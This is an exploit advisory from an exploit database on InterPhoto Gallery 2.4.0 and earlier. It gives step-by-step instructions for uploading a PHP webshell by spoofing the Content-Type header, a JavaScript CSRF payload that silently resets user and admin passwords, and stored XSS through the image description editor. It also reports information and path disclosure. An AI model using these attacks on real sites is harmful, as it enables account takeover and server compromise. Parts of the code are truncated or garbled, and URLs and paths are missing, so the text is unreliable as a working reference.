InterPhoto Gallery Multiple Remote Vulnerabilities

ID 1337DAY-ID-14000
Type zdt
Reporter Abysssec
Modified 2010-09-06T00:00:00


Exploit for php platform in category web applications

InterPhoto Gallery Multiple Remote Vulnerabilities

- Title  : InterPhoto Gallery Multiple Remote Vulnerabilities
- Affected Version : <= 2.4.0
- Vendor  Site   :
- Discovery
- Description :
InterPhoto Image Gallery is an open-source, simple-using, advanced, professional multi-users' image website System,and it can primely protect the images of your site. InterPhoto can be used to build all kinds of sites which lay out images mainly, such as: design, fashion, exhibition, photograph, painting sites and so on.
- Vulnerabilities:
1)Upload ( bypass Image Uploader ):
InterPhoto allows register users uploading Images.
InterPhoto's User can upload php webshell with this way:
    login in the user mode,go to "Publish Image " .
    select file for upload, write other field Required and submit.
    By Tamper Data tools (webscarab, Paros ,...) Trap Request.
    and change "Content-Type" field's value to "image/jpeg".
line 143-150 : 
if ($action == 'insertimage')
        $imagefile         = $_FILES['imagefile'];
        $valid_image_types = array('image/pjpeg',   'image/jpeg', 'image/jpg');
        $uploaddir = BASEPATH.'MyWebsiteImages/';
        @chmod($uploaddir,0777); // it will chmod upload dir  for execute as well  !
as you can see in flow type it's possible to spoof jpeg request .
ln 43-56
if ($image_size[0] > 760 || $image_size[1] > 760) {
        if (@rename($uploaddir.$file_path.'/'.$imagename, $uploaddir.$file_path.'/original/'.$imagename)) {
            CreateImageFile($uploaddir.$file_path.'/original/'.$imagename, $uploaddir.$file_path."/760x760/".$imagename,'760');
            CreateImageFile($uploaddir.$file_path.'/760x760/'.$imagename, $uploaddir.$file_path."/160x160/".$imagename,'160');
            CreateImageFile($uploaddir.$file_path.'/160x160/'.$imagename, $uploaddir.$file_path."/80x80/".$imagename,'80');
            CreateImageFile($uploaddir.$file_path.'/80x80/'.$imagename, $uploaddir.$file_path."/32x32/".$imagename,'32');
        if (@rename($uploaddir.$file_path.'/'.$imagename, $uploaddir.$file_path.'/760x760/'.$imagename)) {
            CreateImageFile($uploaddir.$file_path.'/760x760/'.$imagename, $uploaddir.$file_path."/160x160/".$imagename,'160');
            CreateImageFile($uploaddir.$file_path.'/160x160/'.$imagename, $uploaddir.$file_path."/80x80/".$imagename,'80');
            CreateImageFile($uploaddir.$file_path.'/80x80/'.$imagename, $uploaddir.$file_path."/32x32/".$imagename,'32');
Refer to size of file you can find your shell in following directory:
2)Persistent XSRFs:
Several XSRF existed in this CMS, For Example:Delete user's Image, Change Users&Admin password, Change User&Admin Info,...
Now see Change Users&Admin password:
        Like number 1 ,go to Publish Image and select Edit HTML,and write this code:
                function creat_request(path,parameter,method){
                method = method || "post";
                var remote_dive = document.createElement('div');
       = 'Div_id';
                var style = 'border:0;width:0;height:0;';
                remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='"+style+"'></iframe>";
                var form = document.createElement("form");
                form.setAttribute("method", method);
                form.setAttribute("action", path);
                form.setAttribute("target", "iframename");
                for(var key in parameter)
                var hiddenField = document.createElement("input");
                hiddenField.setAttribute("type", "hidden");
                hiddenField.setAttribute("name", key);
                hiddenField.setAttribute("value", parameter[key]);
                creat_request('',{'action':'updateuser','password':'123456','repassword':'123456','email':'[email protected]','userfullname':'','usercompany':'','useraddress':'','userpostcode':'','usertel':'','userfax':'','useronline':'','userwebsite':''});
        and submit.when any user see this section on Homepage, Delete first image that is Uploaded.
3)stored XSS :
login in the user mode,go to "Publish Image " .Then
in "Image Description:" section, select Edit HTML icon,and write java tag script.( also write other field Required )
and submit.
for see the XSS go to Home page, and click last update image for see.  
Because InterPhoto used nicedit for Image Description.  
4)Information  Disclosure:
    5.1)Backup  Database is Downloadable:
            restrict access to this directory by .htaccess file.
    5.2)Directory listing :
   and ....
            Create index.html in all folders.
5)Path Disclosure:
InterPhoto CMS  has used Smarty library(Templet Engine).
    +Code:for example:class Smarty undefined.
        /library/smarty/libs/Smarty_Compiler.class.php[line 35]
        class Smarty_Compiler extends Smarty {
    +POC:[ all files. ]
        Add frist page :
        Add last page:

# [2018-01-01]  #